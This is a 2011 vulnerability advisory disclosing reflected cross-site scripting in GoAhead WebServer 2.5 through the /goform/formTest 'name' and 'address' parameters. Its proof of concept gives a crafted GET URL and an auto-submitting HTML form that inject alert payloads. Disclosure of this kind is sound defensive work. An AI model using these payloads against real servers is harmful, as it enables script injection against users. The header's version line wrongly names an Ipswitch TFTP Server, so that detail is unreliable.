##############################################################################
# Title     : GoAhead WebServer Multiple Cross Site Scripting Vulnerabilities
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.goahead.com/products/webserver/default.aspx
# Advisory  : http://secpod.org/blog/?p=421
#             http://secunia.com/advisories/46896
#             http://secpod.org/advisories/SecPod_GoAhead_WebServer_Multiple_XSS_Vuln.txt
# Version   : Ipswitch TFTP Server 1.0.0.24
# Date      : 02/12/2011
##############################################################################

SecPod ID: 1029					23/09/2011 Issue Discovered
						04/11/2011 Vendor Notified
						No Response from Vendor
						02/12/2011 Advisory Released


Class: Information Disclosure           Severity: Medium


Overview:
---------
GoAhead WebServer v 2.5 is prone to multiple cross site scripting
vulnerabilities.


Technical Description:
----------------------
Vulnerabilities are caused due to improper validation of input to 'name' &
'address' parameters in /goform/formTest page, which allows attackers to 
induce arbitrary scripts.


Impact:
--------
Successful exploitation could allow users to execute malicious script and 
steal sensitive information.


Affected Software:
------------------
GoAhead WebServer 2.5


Tested on:
-----------
GoAhead WebServer version 2.5 on Fedora Core 10.


References:
-----------
http://www.goahead.com
http://secpod.org/blog/?p=421
http://secunia.com/advisories/46896
http://www.goahead.com/products/webserver/default.aspx
http://webserver.goahead.com/forum/topic/169?replies=1#post-447
http://secpod.org/advisories/SecPod_GoAhead_WebServer_Multiple_XSS_Vuln.txt


Proof of Concept:
----------------
1) GET Request on the following page:

http://<hostip>:8080/goform/formTest?name=%3Cscript%3Ealert(4321)%3C/script%3E&address=%3Cscript%3Ealert(1234)%3C/script%3E


2) POST request:

<html>
 <body>
  <form name=TheForm action=http://<hostip>:8080/goform/formTest method=post>
    <input type=hidden name=name value='<script>alert(document.domain)</script>'>
    <input type=hidden name=address value='<script>alert(document.domain)</script>'>
  </form>
  <script>
    document.TheForm.submit();
  </script>
 </body>
</html>


Solution:
----------
Not available


Risk Factor:
-------------
    CVSS Score Report:
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = MEDIUM
        AUTHENTICATION         = NONE
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = PARTIAL
        AVAILABILITY_IMPACT    = NONE
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)